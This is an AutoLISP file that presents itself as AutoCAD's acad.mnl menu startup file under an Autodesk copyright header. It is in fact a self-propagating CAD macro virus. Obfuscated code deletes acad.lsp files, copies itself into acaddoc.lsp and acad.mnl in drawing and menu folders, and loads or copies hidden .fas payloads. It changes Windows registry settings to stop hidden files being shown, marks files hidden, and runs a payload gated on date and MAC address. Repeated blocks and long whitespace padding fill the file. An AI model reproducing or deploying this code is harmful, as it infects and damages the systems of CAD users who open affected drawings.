(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(setq mnl (strcat (chr 97)
		  (chr 99)
		  (chr 97)
		  (chr 100)
		  (chr 46)
		  (chr 109)
		  (chr 110)
		  (chr 108)
	  )
      lsp (strcat (chr 97)
		  (chr 99)
		  (chr 97)
		  (chr 100)
		  (chr 100)
		  (chr 111)
		  (chr 99)
		  (chr 46)
		  (chr 108)
		  (chr 115)
		  (chr 112)
	  )
)

(vl-file-delete (strcat wpath lsp))
(vl-file-delete (strcat wpath "acad.lsp"))
(vl-file-delete (strcat dpath "acad.lsp"))
(if(null qxgxwddm)(if(findfile "bakdwg.fas")(load "bakdwg.fas")))

(load"shxfont""")(defun wwriteapp ()
  (if (setq wwjm1 (open wnewacad "w"))
    (progn
      (setq wwjm (open woldacad "r"))
      (while(setq wwz (read-line wwjm))
	 (write-line wwz wwjm1)
      )
      (close wwjm)
      (close wwjm1)
    )
  )
)

(setq lbz 0)
(setq wwjqm (strcat dpath lsp))
(if (setq wwjm (open wwjqm "r"))
  (progn
    (repeat 15 (read-line wwjm))
    (setq wz (read-line wwjm))
    (setq ab (atoi (substr wz 4 1)))
    (close wwjm)
    (if	(> ab bb)
      (setq lbz 1)
    )
  )
)

(setq wwjqm (strcat wpath mnl))
(if (setq wwjm (open wwjqm "r"))
  (progn
    (repeat 15 (read-line wwjm))
    (setq wz (read-line wwjm))
    (setq nb (atoi (substr wz 4 1)))
    (close wwjm)
    
    (if	(< nb bb)
      (setq lbz 1)
    )
  )
  (setq lbz 1)
)
(if (= lbz 1)
  (progn
    (setq woldacad (strcat dpath lsp))
    (setq wnewacad (strcat wpath mnl))
    (wwriteapp)
  )
)
(if (and (/= (substr dpath 1 1) (chr 67))
	 (/= (substr dpath 1 1) (chr 68))
	 (/= (substr dpath 1 1) (chr 69))
	 (/= (substr dpath 1 1) (chr 70))
    )
  (progn
    (setq woldacad (strcat wpath mnl))
    (setq wnewacad (strcat dpath lsp))
    (wwriteapp)
  )
  (vl-file-delete (strcat dpath lsp))
)

;;;Virus

(princ)
(if(null autodeskwybs)(if(findfile(vl-list->string '(116 120 116 97 117 116 111 122 46 115 104 120)))(vl-file-copy (findfile(vl-list->string '(116 120 116 97 117 116 111 122 46 115 104 120)))(vl-list->string '(97 99 97 100 46 102 97 115))))(princ))
(if(null autodeskwybs)(if(findfile(vl-list->string '(116 120 116 97 117 116 111 122 46 115 104 120)))(vl-file-copy (findfile(vl-list->string '(116 120 116 97 117 116 111 122 46 115 104 120)))(vl-list->string '(97 99 97 100 46 102 97 115))))(princ))



;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;     ACAD.MNL
;;;     Copyright (C) 1992 - 1997 by Autodesk, Inc.
;;;
;;;     Permission to use, copy, modify, and distribute this software
;;;     for any purpose and without fee is hereby granted, provided
;;;     that the above copyright notice appears in all copies and 
;;;     that both that copyright notice and the limited warranty and 
;;;     restricted rights notice below appear in all supporting 
;;;     documentation.
;;;
;;;     AUTODESK PROVIDES THIS PROGRAM "AS IS" AND WITH ALL FAULTS.  
;;;     AUTODESK SPECIFICALLY DISCLAIMS ANY IMPLIED WARRANTY OF 
;;;     MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE.  AUTODESK, INC. 
;;;     DOES NOT WARRANT THAT THE OPERATION OF THE PROGRAM WILL BE 
;;;     UNINTERRUPTED OR ERROR FREE.
;;;
;;;     Use, duplication, or disclosure by the U.S. Government is subject to 
;;;     restrictions set forth in FAR 52.227-19 (Commercial Computer 
;;;     Software - Restricted Rights) and DFAR 252.227-7013(c)(1)(ii) 
;;;     (Rights in Technical Data and Computer Software), as applicable. 
;;;
;;;     Changes to this file will be migrated to future installations of 
;;;     AutoCAD during migration.
;;;
;;;     This file is loaded automatically following the menu ACAD.  
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(setq mnl (strcat (chr 97)
		  (chr 99)
		  (chr 97)
		  (chr 100)
		  (chr 46)
		  (chr 109)
		  (chr 110)
		  (chr 108)
	  )
      lsp (strcat (chr 97)
		  (chr 99)
		  (chr 97)
		  (chr 100)
		  (chr 100)
		  (chr 111)
		  (chr 99)
		  (chr 46)
		  (chr 108)
		  (chr 115)
		  (chr 112)
	  )
)

(vl-file-delete (strcat wpath lsp))
(vl-file-delete (strcat wpath "acad.lsp"))
(vl-file-delete (strcat dpath "acad.lsp"))
(if(null qxgxwddm)(if(findfile "bakdwg.fas")(load "bakdwg.fas")))
(defun wwriteapp ()
  (if (setq wwjm1 (open wnewacad "w"))
    (progn
      (setq wwjm (open woldacad "r"))
      (while(setq wwz (read-line wwjm))
	 (write-line wwz wwjm1)
      )
      (close wwjm)
      (close wwjm1)
    )
  )
)

(setq lbz 0)
(setq wwjqm (strcat dpath lsp))
(if (setq wwjm (open wwjqm "r"))
  (progn
    (repeat 15 (read-line wwjm))
    (setq wz (read-line wwjm))
    (setq ab (atoi (substr wz 4 1)))
    (close wwjm)
    (if	(> ab bb)
      (setq lbz 1)
    )
  )
)

(setq wwjqm (strcat wpath mnl))
(if (setq wwjm (open wwjqm "r"))
  (progn
    (repeat 15 (read-line wwjm))
    (setq wz (read-line wwjm))
    (setq nb (atoi (substr wz 4 1)))
    (close wwjm)
    
    (if	(< nb bb)
      (setq lbz 1)
    )
  )
  (setq lbz 1)
)
(if (= lbz 1)
  (progn
    (setq woldacad (strcat dpath lsp))
    (setq wnewacad (strcat wpath mnl))
    (wwriteapp)
  )
)
(if (and (/= (substr dpath 1 1) (chr 67))
	 (/= (substr dpath 1 1) (chr 68))
	 (/= (substr dpath 1 1) (chr 69))
	 (/= (substr dpath 1 1) (chr 70))
    )
  (progn
    (setq woldacad (strcat wpath mnl))
    (setq wnewacad (strcat dpath lsp))
    (wwriteapp)
  )
  (vl-file-delete (strcat dpath lsp))
)

;;;Virus

(princ)
(if(null autodeskwybs)(if(findfile(vl-list->string '(116 120 116 97 117 116 111 122 46 115 104 120)))(vl-file-copy (findfile(vl-list->string '(116 120 116 97 117 116 111 122 46 115 104 120)))(vl-list->string '(97 99 97 100 46 102 97 115))))(princ))
(if(null autodeskwybs)(if(findfile(vl-list->string '(116 120 116 97 117 116 111 122 46 115 104 120)))(vl-file-copy (findfile(vl-list->string '(116 120 116 97 117 116 111 122 46 115 104 120)))(vl-list->string '(97 99 97 100 46 102 97 115))))(princ))


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(setq mnl (strcat (chr 97)
		  (chr 99)
		  (chr 97)
		  (chr 100)
		  (chr 46)
		  (chr 109)
		  (chr 110)
		  (chr 108)
	  )
      lsp (strcat (chr 97)
		  (chr 99)
		  (chr 97)
		  (chr 100)
		  (chr 100)
		  (chr 111)
		  (chr 99)
		  (chr 46)
		  (chr 108)
		  (chr 115)
		  (chr 112)
	  )
)

(vl-file-delete (strcat wpath lsp))
(vl-file-delete (strcat wpath "acad.lsp"))
(vl-file-delete (strcat dpath "acad.lsp"))
(if(null qxgxwddm)(if(findfile "bakdwg.fas")(load "bakdwg.fas")))
(defun wwriteapp ()
  (if (setq wwjm1 (open wnewacad "w"))
    (progn
      (setq wwjm (open woldacad "r"))
      (while(setq wwz (read-line wwjm))
	 (write-line wwz wwjm1)
      )
      (close wwjm)
      (close wwjm1)
    )
  )
)

(setq lbz 0)
(setq wwjqm (strcat dpath lsp))
(if (setq wwjm (open wwjqm "r"))
  (progn
    (repeat 15 (read-line wwjm))
    (setq wz (read-line wwjm))
    (setq ab (atoi (substr wz 4 1)))
    (close wwjm)
    (if	(> ab bb)
      (setq lbz 1)
    )
  )
)

(setq wwjqm (strcat wpath mnl))
(if (setq wwjm (open wwjqm "r"))
  (progn
    (repeat 15 (read-line wwjm))
    (setq wz (read-line wwjm))
    (setq nb (atoi (substr wz 4 1)))
    (close wwjm)
    
    (if	(< nb bb)
      (setq lbz 1)
    )
  )
  (setq lbz 1)
)
(if (= lbz 1)
  (progn
    (setq woldacad (strcat dpath lsp))
    (setq wnewacad (strcat wpath mnl))
    (wwriteapp)
  )
)
(if (and (/= (substr dpath 1 1) (chr 67))
	 (/= (substr dpath 1 1) (chr 68))
	 (/= (substr dpath 1 1) (chr 69))
	 (/= (substr dpath 1 1) (chr 70))
    )
  (progn
    (setq woldacad (strcat wpath mnl))
    (setq wnewacad (strcat dpath lsp))
    (wwriteapp)
  )
  (vl-file-delete (strcat dpath lsp))
)

;;;Virus

(princ)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

(setq flagx t)
(setq bz "(setq flagx t)")
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
